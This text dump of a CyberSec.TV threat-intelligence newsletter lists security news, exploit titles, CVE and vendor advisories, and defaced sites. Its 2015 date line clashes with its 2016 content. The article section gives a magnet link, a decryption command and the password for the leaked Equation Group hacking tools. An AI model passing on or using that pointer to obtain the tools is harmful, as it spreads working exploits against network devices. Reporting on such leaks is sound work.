Embed Size (px)
Citation preview
CyberSec.TV 1 | P a g e
Cyber Intelligence Report
CyberSec.TV 2 | P a g e
Contents Summary ...................................................................................................................................................... 3
Extra tips and videos ..................................................................................................................................... 3
Cyber Secrets: ........................................................................................................................................... 3
Explanations: ............................................................................................................................................. 3
Article: ........................................................................................................................................................... 4
News: ............................................................................................................................................................ 5
News: Information Warfare ...................................................................................................................... 5
News: HIPPA .............................................................................................................................................. 6
News: SCADA ............................................................................................................................................. 6
News: Cyber Laws & Legislation ................................................................................................................ 6
News: Computer Forensics ....................................................................................................................... 6
Malicious Logic: ............................................................................................................................................. 7
Exploits ...................................................................................................................................................... 7
Zone-h Interesting Website Defacements:.................................................................................................. 14
Zone-h Interesting Website Defacements - Olympics: ................................................................................ 16
Zone-h Attack Statistics: .............................................................................................................................. 20
.................................................................................................................................................................... 21
Credits: ........................................................................................................................................................ 21
Sponsors: ..................................................................................................................................................... 21
Cyber Intelligence Report
CyberSec.TV 3 | P a g e
Wednesday, August 18th, 2015 The Cyber Intelligence Report is an OSINT resource focusing on advanced persistent threats and other digital dangers. APTs fit into a cybercrime category directed at both business and political targets. Attack vectors include system compromise, social engineering, and even traditional espionage.
Summary Symantec ThreatCon Level 2 - Medium: Increased alertness This condition applies when knowledge or the expectation of attack activity is present, without specific events occurring or when malicious code reaches a moderate risk rating.
extra tips and videos It has been a long time since the last Cyber Intelligence Report (CIR), and there has been a lot going on since. Below is a list of several Cyber Secrets episodes along with a couple new videos that covers what a Red Team penetration test is along with what is entailed in a Social Engineering assessment. As always, if you have any suggestions on improving the CIR or Cyber Secrets, feel free to let us know. [email protected] Past Reports: www.informationwarfarecenter.com/Cyber-Intelligence-Report.html Cyber seCrets:
• IWC-Lab Demo (Hacking Metasploitable with Armitage and Sparta) explanations:
• IWC-Lab (standalone hacking lab)
Cyber Intelligence Report
CyberSec.TV 4 | P a g e
artiCle: Author Jeremy Martin Sr. Security Researcher & Consultant The amount of Cyber Activity has increased during the Olympics and victim systems in Brazil have skyrocketed. At the time of this CIR, over 170 Brazilian domains and government agencies were hacked. Please reference, the zone-h website defacement – Olympics section of this report for more details of many of the attacks. --- Another interesting turn of events with an auction of tools allegedly stolen from the hacking group known as the “Equation Group”. The shadowbrokers originally pushed out the GPG encrypted files and are asking for bitcoins in payment. As some of you have already heard, the Equation group has allegedly been linked to the NSA and has been active for quite a while. Some believe that this group is the definition of a State sponsored cyber threat.
If you are interested in trying to look at the information yourself, the original bit torrent
magnet link is:
magnet:?xt=urn:btih:40a5f1514514fb67943f137f7fde0a7b5e991f76&tr=http://diftracker.i2p/an-
nounce.php
You will need PGP to unencrypt what is currently available. If you are using Linux, Unencrypt them with this command:
gpg --decrypt --output eqgrp-free-file.tar.xz eqgrp-free-file.tar.xz.gpg
Password = theequationgroup
Many people say these are top of the line tools. You can look at the information yourself to vet the validity of these possible tools.
Cyber Intelligence Report
CyberSec.TV 5 | P a g e
news: news: information warfare
• Powerful NSA espionage tools with code names like 'Epicbanana' exposed online - Toronto Star.
• Egypt prosecution appeals Morsi acquittal in 'Qatar espionage case' - Ahram Online.
• Britain's Nuclear Future Threatened By Espionage And The Brexit - OilPrice.com.
• Shakti Trojan: Stealth malware designed for espionage ... - International Business Times UK.
• Aviation's gatekeepers call on governments and hackers alike to tackle cyberthreats - Tnooz.
• Big Banks Form New Group to Combat Cyber Threats | Big Law ... - Bloomberg Big Law Business.
• A Three-pronged Approach for Fighting Foreign Cyber Attacks ... - Signal Magazine.
• China Launches Quantum Satellite To Test Spooky Action At A Distance.
• Iran Investigating Possible Cyber Angle On Oil Fires.
• Baltimore Police Accused Of Illegal Mobile Spectrum Use With Stringrays.
• Snowden Thinks Russia Hacked The NSA.
• Hacker Claims To Be Selling Stolen NSA Spy Tools.
• Latest Windows UAC Bypass Permits Code Execution.
• Hacker Wins $5,000 For Address Bar Spoofing Flaw.
• The NSA's Equation Group May Have Been Compromised.
• Forensics Tool Nabs Data From Signal, Telegram, WhatsApp.
• Sage Data Breach May Impact Hundreds Of Business Customers.
• Alleged Russian Hacker Seleznev Goes On Trial In US.
• 20 Top US Hotels Hit By Fresh Malware Attacks.
• Hacker Reveals Personal Information For Almost 200 Democrats.
• How An IP Mapping Glitch Turned A Farm Into Federal Hell.
• Imperva Under Pressure To Find Buyer After Disappointing Results.
• Think You Can Take Out A Swarm Of Attack Drones?.
• 100 Million Volkswagens At Risk With New Wireless Key Hack.
• Linux.Lady Trojan Turns Linux Servers Into Bitcoin Miners.
• Dota 2 Chat Forum Hit By Hack Attack.
• Exodus Ups Ante Against Apple With $500,000 Bounty.
• Hitler Ransomware Goose-Steps Onto PCs.
• Australian Census Attacked By Hackers.
• Microsoft Proves Backdoor Keys Are A Terrible Idea.
Cyber Intelligence Report
CyberSec.TV 6 | P a g e
news: Hippa
• How to verify your HIPAA compliance - BetaNews.
• Nine Tips For Avoiding HIPAA Breaches When Responding To ... - Mondaq News Alerts
• Encrypting PHI for HIPAA Compliance - Renal and Urology News - Renal and Urology News.
• 10 largest HIPAA settlement fines - Becker's Hospital Review - Becker's Hospital Review.
• It's Not the Olympics, but OCR Sets New HIPAA Settlement Records - Lexology (registration). news: sCada
• SCADA Market – Global Industry Analysis, Size, Share, Growth, Trends and Forecast - PACE Today.
• Big Data and the evolution from traditional to IIoT SCADA - Windpower Engineering.
• New ISA Standards Committee to Improve SCADA Systems - Automation World.
• Don't Get Caught Without a SCADA Migration Plan - ARC Advisory Group (blog).
• ISA launches SCADA Systems Standards Committee - InTech. news: Cyber laws & legislation
• Pakistan adopts controversial law to deal with cyber crimes - Times of India.
• Cyber Civil Corps proposed to protect Australia's economy - ZDNet.
• Besieged Mugabe goes for 'cyber terrorists' with draconian law - The Zimbabwe Standard.
• American Economic Activity Is Rooted In Global Flow Of Information - Forbes.
• Business consortium wants China to change proposed cyber laws - ZDNet.
news: Computer forensiCs
• Computer Crime Laws Need An Update (Perspective) - Bloomberg Big Law Business.
• Hacker group claims to have stolen NSA 'cyberweapons' - Duluth News Tribune.
• Understanding the JAG program purpose areas - Police News.
• Cybersecurity Strategy - Do You Have One Yet? - CIOReview.
• CRIME SCENE INVESTIGATOR I Job - City of Farmington - PoliceOne - Police News.
Cyber Intelligence Report
CyberSec.TV 7 | P a g e
maliCious logiC: exploits • QNAP QTS 4.2.1 Build 20160601 Arbitrary File Overwrite. • QNAP QTS 4.2.0 Build 20160311 / Build 20160601 Cross Site Scripting. • QNAP QTS 4.2.0 Build 20160311 / Build 20160601 Command Injection. • QNAP QTS 4.2.1 Build 20160601 Command Injection. • SIEMENS IP Camera CCMW1025 x.2.2.1798 Change Admin User / Password. • Honeywell IP-Camera HICC-1100PT Credential Disclosure. • EXTRABACON Cisco ASA Remote Code Execution. • ESCALATEPLOWMAN WatchGuard Privilege Escalation. • EPICBANANA Cisco ASA / PIX Privilege Escalation. • ELIGIBLECONTESTANT TOPSEC Remote Code Execution. • ELIGIBLECANDIDATE TOPSEC Remote Code Execution. • ELIGIBLEBOMBSHELL TOPSEC Remote Code Execution. • ELIGIBLEBACHELOR TOPSEC Firewall Exploit. • EGREGIOUSBLUNDER Fortigate Remote Code Execution. • Metasploit Service Persistence Module. • Metasploit Cron Persistence Module. • Siemens IP-Camera Unauthenticated Remote Credential Disclosure. • Microsoft Windows Kernel win32k.sys FON Divide-By-Zero. • Microsoft GDI+ EMR_EXTTEXTOUTA / EMR_POLYTEXTOUTA Buffer Overflow. • Microsoft GDI+ DecodeCompressedRLEBitmap Out-Of-Bounds Write. • Microsoft GDI+ ValidateBitmapInfo Out-Of-Bounds Write. • NetIQ Access Manager iManager 2.7.7.6 / 2.7.7.5 Cross Site Scripting. • Pi-Hole 2.8.1 Cross Site Scripting. • GitLab Impersonate Privilege Escalation. • Microsoft Office Word 2013 / 2016 Denial Of Service .
Cyber Intelligence Report
CyberSec.TV 8 | P a g e
Cve advisories
• CVE-2015-2790.
2015-03-30 Foxit Reader, Enterprise Reader, and PhantomPDF before 7.1 allow remote attackers to cause a denial of service (memory corruption and crash) via a crafted (1) Ubyte Size in a DataSubBlock structure or (2) LZWMinimumCodeSize in a GIF image. (CVSS:4.3) (Last Update:2015-07-02)
• CVE-2015-2789.
2015-03-30 Unquoted Windows search path vulnerability in the Foxit Cloud Safe Update Service in the Cloud plugin in Foxit Reader 6.1 through 7.0.6.1126 allows local users to gain privileges via a Trojan horse program in the %SYSTEMDRIVE% folder. (CVSS:4.4) (Last Update:2015-03-31)
• CVE-2015-2701.
2015-03-25 Cross-site request forgery (CSRF) vulnerability in CS-Cart 4.2.4 allows remote attackers to hijack the authentication of users for requests that change a user password via a request to profiles-update/. (CVSS:6.8) (Last Update:2015-03-26)
• CVE-2015-2680.
2015-03-23 Cross-site request forgery (CSRF) vulnerability in MetalGenix GeniXCMS before 0.0.2 allows remote attackers to hijack the authentication of administrators for requests that add an administrator account via a request in the users page to gxadmin/index.php. (CVSS:6.8) (Last Update:2015-03-24)
• CVE-2015-2679.
2015-03-23 Multiple SQL injection vulnerabilities in MetalGenix GeniXCMS before 0.0.2 allow remote attackers to execute arbitrary SQL commands via the (1) page parameter to index.php or (2) username parameter to gxadmin/login.php. (CVSS:7.5) (Last Update:2015-03-24)
• CVE-2015-2678.
2015-03-23 Multiple cross-site scripting (XSS) vulnerabilities in MetalGenix GeniXCMS before 0.0.2 allow remote attackers to inject arbitrary web script or HTML via the (1) cat parameter in the categories page to gxadmin/index.php or (2) page parameter to index.php. (CVSS:4.3) (Last Update:2015-03-24)
Cyber Intelligence Report
CyberSec.TV 9 | P a g e
• CVE-2015-2564.
2015-03-20 SQL injection vulnerability in client-edit.php in ProjectSend (formerly cFTP) r561 allows remote authenticated users to execute arbitrary SQL commands via the id parameter to users-edit.php. (CVSS:6.5) (Last Update:2015-03-23)
• CVE-2015-2275.
2015-03-12 Cross-site scripting (XSS) vulnerability in WoltLab Community Gallery 2.0 before 2014-12-26 allows remote attackers to inject arbitrary web script or HTML via the parameters[data][7][title] parameter in a saveImageData action to index.php/AJAXProxy. (CVSS:4.3) (Last Update:2015-09-24)
• CVE-2015-2218.
2015-03-05 Multiple cross-site scripting (XSS) vulnerabilities in the wp_ajax_save_item function in wonderpluginaudio.php in the WonderPlugin Audio Player plugin before 2.1 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) item[name] or (2) item[customcss] parameter in a wonderplugin_audio_save_item action to wp-admin/admin-ajax.php or the itemid parameter in the (3) wonderplugin_audio_show_item or (4) wonderplugin_audio_edit_item page to wp-admin/admin.php. (CVSS:4.3) (Last Update:2015-03-05)
• CVE-2015-2216.
2015-03-05 SQL injection vulnerability in ecomm-sizes.php in the Photocrati theme 4.x for WordPress allows remote attackers to execute arbitrary SQL commands via the prod_id parameter. (CVSS:7.5) (Last Update:2015-11-24)
• CVE-2015-2208.
2015-03-12 The saveObject function in moadmin.php in phpMoAdmin 1.1.2 allows remote attackers to execute arbitrary commands via shell metacharacters in the object parameter. (CVSS:7.5) (Last Update:2015-03-12)
• CVE-2015-2199.
2015-03-03 Multiple SQL injection vulnerabilities in the WonderPlugin Audio Player plugin before 2.1 for WordPress allow (1) remote authenticated users to execute arbitrary SQL commands via the item[id] parameter in a wonderplugin_audio_save_item action to wp-admin/admin-ajax.php or remote administrators to execute arbitrary SQL commands via the itemid parameter in the (2)
Cyber Intelligence Report
CyberSec.TV 10 | P a g e
wonderplugin_audio_show_item, (3) wonderplugin_audio_show_items, or (4) wonderplugin_audio_edit_item page to wp-admin/admin.php. (CVSS:6.5) (Last Update:2015-03-04)
• CVE-2015-2198.
2015-03-03 Multiple cross-site scripting (XSS) vulnerabilities in edit_prefs.php in Beehive Forum 1.4.4 allow remote attackers to inject arbitrary web script or HTML via the (1) homepage_url, (2) pic_url, or (3) avatar_url parameter, which are not properly handled in an error message. (CVSS:4.3) (Last Update:2015-03-04)
• CVE-2015-2196.
2015-03-03 SQL injection vulnerability in Spider Event Calendar 1.4.9 for WordPress allows remote attackers to execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php. (CVSS:7.5) (Last Update:2015-03-04)
• CVE-2015-2184.
• 2015-03-10
ZeusCart 4 allows remote attackers to obtain configuration information via a getphpinfo action to
admin/, which calls the phpinfo function. (CVSS:5.0) (Last Update:2015-03-11)
advisories
• Debian Security Advisory 3650-1.
Thu, 18 Aug 2016 16:50:09 GMT Debian Linux Security Advisory 3650-1 - Felix Doerre and Vladimir Klebanov from the Karlsruhe Institute of Technology discovered a flaw in the mixing functions of Libgcrypt's random number generator. An attacker who obtains 4640 bits from the RNG can trivially predict the next 160 bits of output.
• Debian Security Advisory 3649-1.
Thu, 18 Aug 2016 16:50:00 GMT Debian Linux Security Advisory 3649-1 - Felix Doerre and Vladimir Klebanov from the Karlsruhe Institute of Technology discovered a flaw in the mixing functions of GnuPG's random number generator. An attacker who obtains 4640 bits from the RNG can trivially predict the next 160 bits of output.
• Cisco Security Advisory 20160817-asa-snmp.
Thu, 18 Aug 2016 16:49:44 GMT
Cyber Intelligence Report
CyberSec.TV 11 | P a g e
Cisco Security Advisory - A vulnerability in the Simple Network Management Protocol (SNMP) code of Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated, remote attacker to cause a reload of the affected system or to remotely execute code. The vulnerability is due to a buffer overflow in the affected code area. An attacker could exploit this vulnerability by sending crafted SNMP packets to the affected system. An exploit could allow the attacker to execute arbitrary code and obtain full control of the system or to cause a reload of the affected system. The attacker must know the SNMP community string to exploit this vulnerability. Note: Only traffic directed to the affected system can be used to exploit this vulnerability. This vulnerability affects systems configured in routed and transparent firewall mode only and in single or multiple context mode. This vulnerability can be triggered by IPv4 traffic only. Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability.
• Red Hat Security Advisory 2016-1625-02.
Wed, 17 Aug 2016 23:24:00 GMT Red Hat Security Advisory 2016-1625-02 - This release of Red Hat JBoss Core Services Service Pack 1 serves as a replacement for JBoss Core Services Apache HTTP Server. Security Fix: It was discovered that Apache HTTP Server used the value of the Proxy header from HTTP requests to initialize the HTTP_PROXY environment variable for CGI scripts, which in turn was incorrectly used by certain HTTP client implementations to configure the proxy for outgoing HTTP requests. A remote attacker could possibly use this flaw to redirect HTTP requests performed by a CGI script to an attacker-controlled proxy via a malicious HTTP request.
• Red Hat Security Advisory 2016-1624-01.
Wed, 17 Aug 2016 23:23:00 GMT Red Hat Security Advisory 2016-1624-01 - This release of Red Hat JBoss Web Server 3.0.3 Service Pack 1 serves as a update for Red Hat JBoss Web Server 3.0.3 httpd and tomcat. Security Fix: It was discovered that httpd used the value of the Proxy header from HTTP requests to initialize the HTTP_PROXY environment variable for CGI scripts, which in turn was incorrectly used by certain HTTP client implementations to configure the proxy for outgoing HTTP requests. A remote attacker could possibly use this flaw to redirect HTTP requests performed by a CGI script to an attacker-controlled proxy via a malicious HTTP request.
• Ubuntu Security Notice USN-3063-1.
Wed, 17 Aug 2016 17:40:11 GMT Ubuntu Security Notice 3063-1 - Tobias Stoeckmann discovered that Fontconfig incorrectly handled cache files. A local attacker could possibly use this issue with a specially crafted cache file to elevate privileges.
• Cisco Security Advisory 20160817-fmc.
Wed, 17 Aug 2016 17:39:23 GMT Cisco Security Advisory - A vulnerability in the web-based GUI of Cisco Firepower Management Center and Cisco Adaptive Security Appliance (ASA) 5500-X Series with FirePOWER Services
Cyber Intelligence Report
CyberSec.TV 12 | P a g e
could allow an authenticated, remote attacker to perform unauthorized remote command execution on the affected device. The vulnerability is due to insufficient authorization checking. An attacker could exploit this vulnerability by sending crafted HTTP requests to the affected device. Successful exploitation could allow an authenticated attacker to execute system commands with root-level privileges. Cisco has released software updates that address this vulnerability. Workarounds that address this vulnerability are not available.
• Cisco Security Advisory 20160817-apic.
Wed, 17 Aug 2016 17:39:15 GMT Cisco Security Advisory - A vulnerability in the Grapevine update process of the Cisco Application Policy Infrastructure Controller Enterprise Module (APIC-EM) could allow an authenticated, remote attacker to execute arbitrary commands on the underlying operating system with the privileges of the root user. The vulnerability is due to insufficient input sanitization during the Grapevine update process. An attacker could exploit this vulnerability by authenticating to the affected system with administrative privileges and inserting arbitrary commands into an upgrade parameter. An exploit could allow the attacker to execute arbitrary commands on the affected system with root-level privileges. Cisco has released software updates that address this vulnerability. Workarounds that address this vulnerability are not available.
• Cisco Security Advisory 20160817-firepower.
Wed, 17 Aug 2016 17:39:09 GMT Cisco Security Advisory - A vulnerability in the web-based GUI of Cisco Firepower Management Center and Cisco Adaptive Security Appliance (ASA) 5500-X Series with FirePOWER Services could allow an authenticated, remote attacker to elevate the privileges of user accounts on the affected device. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending crafted HTTP requests to the affected device. Successful exploitation could allow an authenticated attacker to elevate the privileges of user accounts configured on the device. Cisco has released software updates that address this vulnerability. Workarounds that address this vulnerability are not available.
• Ubuntu Security Notice USN-3062-1.
Wed, 17 Aug 2016 00:38:37 GMT Ubuntu Security Notice 3062-1 - Multiple vulnerabilities were discovered in the OpenJDK JRE related to information disclosure, data integrity, and availability. An attacker could exploit these to cause a denial of service, expose sensitive data over the network, or possibly execute arbitrary code. A vulnerability was discovered in the OpenJDK JRE related to data integrity. An attacker could exploit this to expose sensitive data over the network or possibly execute arbitrary code. Various other issues were also addressed.
• Red Hat Security Advisory 2016-1617-01.
Tue, 16 Aug 2016 21:09:59 GMT Red Hat Security Advisory 2016-1617-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Security Fix: A flaw was found in the way certain interfaces of the
Cyber Intelligence Report
CyberSec.TV 13 | P a g e
Linux kernel's Infiniband subsystem used write() as bi-directional ioctl() replacement, which could lead to insufficient memory security checks when being invoked using the splice() system call. A local unprivileged user on a system with either Infiniband hardware present or RDMA Userspace Connection Manager Access module explicitly loaded, could use this flaw to escalate their privileges on the system.
• HP Security Bulletin HPSBHF03441 1.
Tue, 16 Aug 2016 15:37:05 GMT HP Security Bulletin HPSBHF03441 1 - Potential security vulnerabilities have been identified in HPE Integrated Lights Out 3 and HPE Integrated Lights Out 4, and Integrated Lights Out 4 mRCA. The vulnerabilities could lead to multiple remote vulnerabilities. Revision 1 of this advisory.
• SAP Hybris E-commerce Suite 5.1.0.3 Hard-Coded Password.
Tue, 16 Aug 2016 15:21:28 GMT SAP Hybris E-commerce Suite version 5.1.0.3 suffers from a hard-coded password vulnerability.
• HP Security Bulletin HPSBGN03634 1.
Tue, 16 Aug 2016 15:20:59 GMT HP Security Bulletin HPSBGN03634 1 - A potential security vulnerability has been identified in HPE Enterprise Solution Sizers and Storage Sizer running Smart Update. The vulnerability could be exploited remotely to allow arbitrary code execution. Revision 1 of this advisory.
• php-gettext Code Execution.
Tue, 16 Aug 2016 15:19:37 GMT php-gettext versions prior to 1.0.12 suffer from a code execution vulnerability.
Cyber Intelligence Report
CyberSec.TV 14 | P a g e
Zone-H interesting website defaCements: Notifier Domain OS View 4ng3lz Team cetucker.scripts.mit.edu Linux mirror
4ng3lz Team dll.scripts.mit.edu Linux mirror
4ng3lz Team ecastill.scripts.mit.edu Linux mirror
4ng3lz Team eso.scripts.mit.edu Linux mirror
4ng3lz Team hazhir.scripts.mit.edu Linux mirror
4ng3lz Team japarker.scripts.mit.edu Linux mirror
4ng3lz Team jeffd.scripts.mit.edu/riyer/ Linux mirror
4ng3lz Team jgranja.scripts.mit.edu Linux mirror
4ng3lz Team jjzhang.scripts.mit.edu Linux mirror
4ng3lz Team jnbarrot.scripts.mit.edu Linux mirror
4ng3lz Team jorlin.scripts.mit.edu Linux mirror
4ng3lz Team jwilkin.scripts.mit.edu Linux mirror
4ng3lz Team jyates.scripts.mit.edu Linux mirror
4ng3lz Team mmarx.scripts.mit.edu Linux mirror
4ng3lz Team nbergman.scripts.mit.edu Linux mirror
4ng3lz Team olenka.scripts.mit.edu Linux mirror
4ng3lz Team pazoulay.scripts.mit.edu Linux mirror
4ng3lz Team retsef.scripts.mit.edu Linux mirror
4ng3lz Team rnchen.scripts.mit.edu Linux mirror
4ng3lz Team robertof.scripts.mit.edu Linux mirror
4ng3lz Team roshea.scripts.mit.edu Linux mirror
4ng3lz Team shroff.scripts.mit.edu Linux mirror
Admeral zino_DZ mcdermott.house.gov/az.htm Linux mirror
Anamal web.ornl.gov/cgi-bin/cgiwrap/l... Unknown mirror
Ashiyane Digital Security Team www.dickinsoncountymi.gov/imag... Win 2008 mirror
cyber-71 www.broadview-il.gov Linux mirror
Et04 beta.dublinohiousa.gov Linux mirror
Et04 communityplan.dublinohiousa.gov Linux mirror
Et04 dublinohiousa.gov Linux mirror
Et04 dubnet.dublinohiousa.gov Linux mirror
Et04 hbc.dublinohiousa.gov Linux mirror
Et04 makingithappen.dublinohiousa.gov Linux mirror
Et04 openforbusiness.dublinohiousa.gov Linux mirror
Et04 www.bridgestreet.dublinohiousa... Linux mirror
Et04 www.econdev.dublinohiousa.gov Linux mirror
Et04 www.globalinstitute.dublinohio... Linux mirror
jok3r remap.ucla.edu/modules/mod_ppc... Linux mirror
jok3r schepens.harvard.edu/modules/m... Linux mirror
Monsters Defacers www.cutlerbay-fl.gov Linux mirror
OniXeeMa www.gallatin-tn.gov Linux mirror
ProtoWave Reloaded facultyrecruiting.wharton.upen... Win 2012 mirror
ProtoWave Reloaded metalab.harvard.edu Linux mirror
ProtoWave Reloaded spanish-portuguese.berkeley.ed... Linux mirror
ProtoWave Reloaded teach.appinventor.mit.edu Linux mirror
Rap Morix www.lanesboro-mn.gov/site/news... Linux mirror
Cyber Intelligence Report
CyberSec.TV 15 | P a g e
S3K1 podaac-w10n.jpl.nasa.gov/w10n/... Linux mirror
Tomhawk www.bls.gov/Hacked%20by%20Tomhawk Win 2008 mirror
v0ldsec augmented.harvard.edu Linux mirror
v0ldsec comm217.stanford.edu/vold.htm F5 Big-IP mirror
v0ldsec scenic.princeton.edu/network20... Linux mirror
YaNaL-x Jo www-new.remap.ucla.edu/modules... Linux mirror
YasH locast.mit.edu/healthdiary/sta... Linux mirror
Cyber Intelligence Report
CyberSec.TV 16 | P a g e
Zone-H interesting website defaCements - olympiCs: Notifier Domain OS View ~XHunter~ camaraipua.sp.gov.br Linux mirror
5ub50l0 www.lifanmotors.com.br/carros/ Win 2008 mirror
aDriv4 biblioteca.piracicaba.sp.gov.br Linux mirror
aDriv4 camarasaocarlos.sp.gov.br/vzla... Linux mirror
aDriv4 ci.piracicaba.sp.gov.br Linux mirror
aDriv4 comdema.piracicaba.sp.gov.br Linux mirror
aDriv4 conselhocontribuintes.piracica... Linux mirror
aDriv4 conselhos.piracicaba.sp.gov.br Linux mirror
aDriv4 epatespo.piracicaba.sp.gov.br Linux mirror
aDriv4 financas.piracicaba.sp.gov.br Linux mirror
aDriv4 guardacivil.piracicaba.sp.gov.br Linux mirror
aDriv4 lagarto.se.gov.br/novo/vzla.htm Linux mirror
aDriv4 sedema.piracicaba.sp.gov.br Linux mirror
aDriv4 selam.piracicaba.sp.gov.br Linux mirror
aDriv4 sema.piracicaba.sp.gov.br Linux mirror
aDriv4 semac.piracicaba.sp.gov.br Linux mirror
aDriv4 semad.piracicaba.sp.gov.br Linux mirror
aDriv4 semdec.piracicaba.sp.gov.br Linux mirror
aDriv4 semtre.piracicaba.sp.gov.br Linux mirror
aDriv4 semuttran.piracicaba.sp.gov.br Linux mirror
aDriv4 setur.piracicaba.sp.gov.br Linux mirror
aDriv4 transparencia.piracicaba.sp.go... Linux mirror
aDriv4 urbal.piracicaba.sp.gov.br Linux mirror
aDriv4 www.cerest.piracicaba.sp.gov.b... Linux mirror
aDriv4 www.direito.uff.br/vzla.htm Linux mirror
aDriv4 www.missal.pr.gov.br/industria... Linux mirror
aDriv4 www.piracicaba.sp.gov.br Linux mirror
Ali Morshedloo escudoazul.arquivonacional.gov... Win 2003 mirror
Anarchy Ghost ead.cgu.gov.br F5 Big-IP mirror
Anarchy Ghost forum.cgu.gov.br F5 Big-IP mirror
Anarchy Ghost ojs.cgu.gov.br F5 Big-IP mirror
Anarchy Ghost relats.cgu.gov.br F5 Big-IP mirror
Anarchy Ghost www.todosjuntoscontracorrupcao... F5 Big-IP mirror
Ashiyane Digital Security Team santoaugusto.rs.gov.br/curricu... Linux mirror
d3b~X carsale.uol.com.br/nyet.gif Linux mirror
djawa.hattab prefeituradegoias.go.gov.br/_i... Linux mirror
fallaga team carrascobonito.to.gov.br Linux mirror
fallaga team esperantina.to.gov.br Linux mirror
fallaga team saosebastiao.to.gov.br Linux mirror
Fatal Error www.cauce.gov.br Win 2012 mirror
Fatal Error www.caumt.gov.br Win 2012 mirror
Fatal Error www.cmfloresta.pr.gov.br Linux mirror
Fathur.xZ seed.mg.gov.br/i.html Linux mirror
Fathur.xZ tecnologia.mg.gov.br/i.html Linux mirror
Fathur.xZ www.minasdigital.mg.gov.br/i.html Linux mirror
Cyber Intelligence Report
CyberSec.TV 17 | P a g e
Hacker Sakit Hati www.machado.mg.gov.br Linux mirror
Hani Xavi ctareja.fe.unb.br Linux mirror
HighTech www.acjunior.em.ufop.br Linux mirror
HighTech www.arquivopermanente.em.ufop.br Linux mirror
HighTech www.assint.ufop.br Linux mirror
HighTech www.caint.ufop.br Linux mirror
HighTech www.comitedeetica.ufop.br Linux mirror
HighTech www.congressolusobrasileiro.uf... Linux mirror
HighTech www.congressomediacao.ufop.br Linux mirror
HighTech www.encontrodesaberes.ufop.br Linux mirror
HighTech www.ielmomarinho.rn.gov.br Linux mirror
HighTech www.intercom.ufop.br Linux mirror
HighTech www.leishvaccines2012.ufop.br Linux mirror
HighTech www.mpec.ufop.br Linux mirror
HighTech www.neab.ufop.br Linux mirror
HighTech www.nupetur.ufop.br Linux mirror
HighTech www.pmec.sp.gov.br Linux mirror
HighTech www.posedu.ufop.br Linux mirror
HighTech www.prace.ufop.br Linux mirror
HighTech www.pro-ativa.ufop.br Linux mirror
HighTech www.proad.ufop.br Linux mirror
HighTech www.propp.ufop.br Linux mirror
HighTech www.revistamusear.ufop.br Linux mirror
HighTech www.sbqs2009.ufop.br Linux mirror
HighTech www.sext.ufop.br Linux mirror
HighTech www.sic.ufop.br Linux mirror
HighTech www.sisbin.ufop.br Linux mirror
ice-cream uaitec.mg.gov.br/x.htm Linux mirror
jok3r stm.jus.br/images/0wn.txt Linux mirror
K3N1 esic.mulungudomorro.ba.gov.br Linux mirror
K3N1 esic.saogabriel.ba.gov.br Linux mirror
Laakel En Person conselhos.cut.org.br/system/ Linux mirror
Laakel En Person cop.cut.org.br/system/ Linux mirror
Laakel En Person frentebrasil.org.br/system/ Linux mirror
Laakel En Person www.cdhic.org.br/system/ Linux mirror
Monsters Defacers www.camaraafranio.pe.gov.br Win 2008 mirror
Monsters Defacers www.cantodoburiti.pi.gov.br Win 2008 mirror
Monsters Defacers www.cmcaldeiraogrande.pi.gov.br Win 2008 mirror
Monsters Defacers www.pedrodorosario.ma.gov.br Win 2008 mirror
Monsters Defacers www.ribeirogoncalves.pi.gov.br Win 2008 mirror
Moroccan Hassan www.ifac.ufop.br/colegiado/ Linux mirror
Moroccan Hassan www.ilb.ufop.br Linux mirror
Moroccan Hassan www.leir.ufop.br/colecao/ Linux mirror
NeT.Defacer saofranciscodeassis.rs.gov.br/... Linux mirror
ProtoWave risadaria.uol.com.br/campeonato/ Linux mirror
ProtoWave zecabaleiro.uol.com.br Linux mirror
ProtoWave Reloaded adm.cyclops.ufsc.br Linux mirror
Cyber Intelligence Report
CyberSec.TV 18 | P a g e
ProtoWave Reloaded atendimento.telemedicina.ufsc.br Linux mirror
ProtoWave Reloaded biblio.campobom.rs.gov.br Linux mirror
ProtoWave Reloaded biblioteca.campobom.rs.gov.br Linux mirror
ProtoWave Reloaded colegiados.if.sc.usp.br/cta/pr... Linux mirror
ProtoWave Reloaded cyclops.telemedicina.ufsc.br Linux mirror
ProtoWave Reloaded economia.estadao.com.br/intera... Linux mirror
ProtoWave Reloaded forbes.tj.ba.gov.br/precregesp... Linux mirror
ProtoWave Reloaded forbes.tjba.jus.br/precregespe... Linux mirror
ProtoWave Reloaded gqs.incod.ufsc.br Linux mirror
ProtoWave Reloaded hemoterapia.incod.ufsc.br Linux mirror
ProtoWave Reloaded moodle.telemedicina.ufsc.br Linux mirror
ProtoWave Reloaded pesquisa.incod.ufsc.br Linux mirror
ProtoWave Reloaded politica.estadao.com.br/intera... Linux mirror
ProtoWave Reloaded redir.uol.com.br/carlaperez Linux mirror
ProtoWave Reloaded sigsc.incod.ufsc.br Linux mirror
ProtoWave Reloaded site.telemedicina.ufsc.br Linux mirror
ProtoWave Reloaded survey.gqs.ufsc.br Linux mirror
ProtoWave Reloaded sysadm.cyclops.ufsc.br Linux mirror
ProtoWave Reloaded tmp.mpce.mp.br/pWave.shtml Win 2003 mirror
ProtoWave Reloaded uol.com.br/carlaperez Linux mirror
ProtoWave Reloaded webservice.telemedicina.ufsc.br Linux mirror
ProtoWave Reloaded wikiclima.incod.ufsc.br Linux mirror
ProtoWave Reloaded wikidesastres.incod.ufsc.br Linux mirror
ProtoWave Reloaded wikiunasus.telemedicina.ufsc.br Linux mirror
ProtoWave Reloaded www.conexaosaude.ufsc.br Linux mirror
ProtoWave Reloaded www.crecigo.gov.br/modules/mod... Linux mirror
ProtoWave Reloaded www.creciro.gov.br/modules/mod... Linux mirror
ProtoWave Reloaded www.cyclops.ufsc.br Linux mirror
ProtoWave Reloaded www.ead.fiocruz.br/_xml/cool.htm Linux mirror
ProtoWave Reloaded www.estadao.com.br/interativid... Linux mirror
ProtoWave Reloaded www.gqs.ufsc.br Linux mirror
ProtoWave Reloaded www.incod.ufsc.br Linux mirror
ProtoWave Reloaded www.lapix.ufsc.br Linux mirror
